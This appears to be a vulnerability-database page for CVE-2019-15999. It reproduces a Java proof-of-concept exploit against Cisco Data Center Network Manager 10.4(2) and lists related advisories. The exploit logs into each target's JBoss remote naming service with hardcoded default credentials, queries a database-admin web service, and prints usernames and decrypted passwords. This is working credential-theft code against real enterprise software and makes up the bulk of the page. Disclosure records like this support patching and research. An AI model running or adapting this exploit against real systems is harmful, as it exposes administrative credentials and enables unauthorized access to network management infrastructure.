| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Cisco DCNM JBoss 10.4 - Credential Leakage Exploit | 8 Jan 202000:00 | – | zdt | |
| CVE-2019-15999 | 19 Mar 202415:46 | – | circl | |
| Cisco Data Center Network Manager JBoss EAP Unauthorized Access Vulnerability | 2 Jan 202016:00 | – | cisco | |
| Cisco Data Center Network Manager < 11.3(1) Multiple Vulnerabilities | 9 Jan 202000:00 | – | nessus | |
| Cisco Data Center Network Manager JBoss EAP Unauthorized Access Vulnerability | 3 Jan 202000:00 | – | cnvd | |
| CVE-2019-15999 | 6 Jan 202007:45 | – | cve | |
| CVE-2019-15999 Cisco Data Center Network Manager JBoss EAP Unauthorized Access Vulnerability | 6 Jan 202007:45 | – | cvelist | |
| EUVD-2019-6892 | 7 Oct 202500:30 | – | euvd | |
| Cisco DCNM JBoss 10.4 - Credential Leakage | 8 Jan 202000:00 | – | exploitpack | |
| CVE-2019-15999 | 6 Jan 202008:15 | – | nvd |
# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
# Date: 2020-01-06
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
# Version: 10.4(2)
# CVE: CVE-2019-15999
# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/dcnm_expl/Main.java
# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]
package com.whatdidibreak.dcnm_expl;
import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
import com.cisco.dcbu.jaxws.wo.DBRowDO;
import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;
import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;
public class Main {
public static void main(String[] args) throws Throwable {
for (String target : args) {
System.out.println("Target: " + target);
Properties jndiProps = new Properties();
jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
jndiProps.put("jboss.naming.client.ejb.context", true);
Context ctx = new InitialContext(jndiProps);
DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");
for (DBRowDO row : i.getServerProperties(null).getRows()) {
String propName = row.getEntry()[0];
String propValue = row.getEntry()[1];
if (propValue.isEmpty()) {
continue;
}
if (propName.contains("user")) {
System.out.println(propName + " = " + propValue);
} else if (propName.contains("pass")) {
System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
}
}
System.out.println();
}
}
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation